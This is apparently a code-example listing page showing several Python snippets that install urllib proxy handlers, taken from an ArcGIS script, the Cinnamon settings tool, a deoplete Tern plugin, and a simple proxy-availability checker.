#opener = request.build_opener(proxy_handler, auth, request.HTTPHandler)

opener = request.build_opener(proxy_handler)

# opener.addheaders = [("Proxy-Switch-Ip", "yes")]
request.install_opener(opener)
resp = request.urlopen(targetUrl).read()

print(resp)
Example #26
    # Test to see if ArcGIS desktop installed
    if ((os.path.basename(sys.executable).lower() == "arcgispro.exe")
            or (os.path.basename(sys.executable).lower() == "arcmap.exe")
            or (os.path.basename(sys.executable).lower() == "arccatalog.exe")):
        arcgisDesktop = "true"

    # If ArcGIS desktop installed
    if (arcgisDesktop == "true"):
        argv = tuple(
            arcpy.GetParameterAsText(i)
            for i in range(arcpy.GetArgumentCount()))
    # ArcGIS desktop not installed
    else:
        argv = sys.argv
        # Delete the first argument, which is the script
        del argv[0]
    # Logging
    if (enableLogging == "true"):
        # Setup logging
        logger, logMessage = setLogging(logFile)
        # Log start of process
        logger.info("Process started.")
    # Setup the use of a proxy for requests
    if (enableProxy == "true"):
        # Setup the proxy
        proxy = urllib2.ProxyHandler({requestProtocol: proxyURL})
        openURL = urllib2.build_opener(proxy)
        # Install the proxy
        urllib2.install_opener(openURL)
    mainFunction(*argv)
Example #27
        for child in children:
            child.hide()
            if child.get_name() == "c_box":
                c_widgets = child.get_children()
                for c_widget in c_widgets:
                    c_widget.hide()
        self.main_stack.set_visible_child_name("side_view_page")
        self.header_stack.set_visible_child_name("side_view")
        self.search_entry.grab_focus()
        self.current_sidepage = None

    def quit(self, *args):
        self.window.destroy()
        Gtk.main_quit()


if __name__ == "__main__":
    setproctitle("cinnamon-settings")
    import signal

    ps = proxygsettings.get_proxy_settings()
    if ps:
        proxy = urllib.ProxyHandler(ps)
    else:
        proxy = urllib.ProxyHandler()
    urllib.install_opener(urllib.build_opener(proxy))

    window = MainWindow()
    signal.signal(signal.SIGINT, window.quit)
    Gtk.main()
Example #28
def install_proxy(proxy_handler):
    proxy_support = request.ProxyHandler(proxy_handler)
    opener = request.build_opener(proxy_support)
    request.install_opener(opener)
Example #29
import re
import json
import http
import platform
import subprocess
import threading

from urllib import request
from urllib.error import HTTPError
from urllib.error import URLError

from deoplete.source.base import Base

is_window = platform.system() == 'Windows'
import_re = r'require\(\s*["\'][@\w\./-]*$|from\s+["\'][@\w\./\-]*$'
import_pattern = re.compile(import_re)
opener = request.build_opener(request.ProxyHandler({}))


class Source(Base):
    def __init__(self, vim):
        super(Source, self).__init__(vim)

        self.name = 'tern'
        self.mark = '[TernJS]'
        self.input_pattern = (r'\w+|[\.\{@\'"]\s*[-/]?\w*')
        self.rank = 900
        self.is_volatile = True
        self.filetypes = ['javascript']
        if 'deoplete#sources#ternjs#filetypes' in vim.vars:
            self.filetypes.extend(
                vim.vars['deoplete#sources#ternjs#filetypes'])
Example #30
import datetime
import urllib.request as urllib2

now = datetime.datetime.now()
started = now.strftime("%Y-%m-%d %H:%M:%S")

addresses = ['177.99.206.82:8080','34.83.71.102:8080','37.120.159.64:80','118.174.46.144:45330']
# address = '37.120.159.64:80'
for address in addresses:
    try:
        proxy_handler = urllib2.ProxyHandler({'http': address})
        opener = urllib2.build_opener(proxy_handler)
        opener.addheaders = [('User-agent', 'Mozilla/5.0')]
        urllib2.install_opener(opener)
        req = urllib2.Request("http://103.41.204.195/ping.php")
        sock = urllib2.urlopen(req, timeout=10)
        rs = sock.read(1000)
        print(rs)
        if rs is None:
            proxy_result = "No"
        else:
            proxy_result = "Yes"
        now = datetime.datetime.now()
        finished = now.strftime("%Y-%m-%d %H:%M:%S")
    except Exception:
        proxy_result = "No"
        now = datetime.datetime.now()
        finished = now.strftime("%Y-%m-%d %H:%M:%S")

    print(address,proxy_result,started,finished)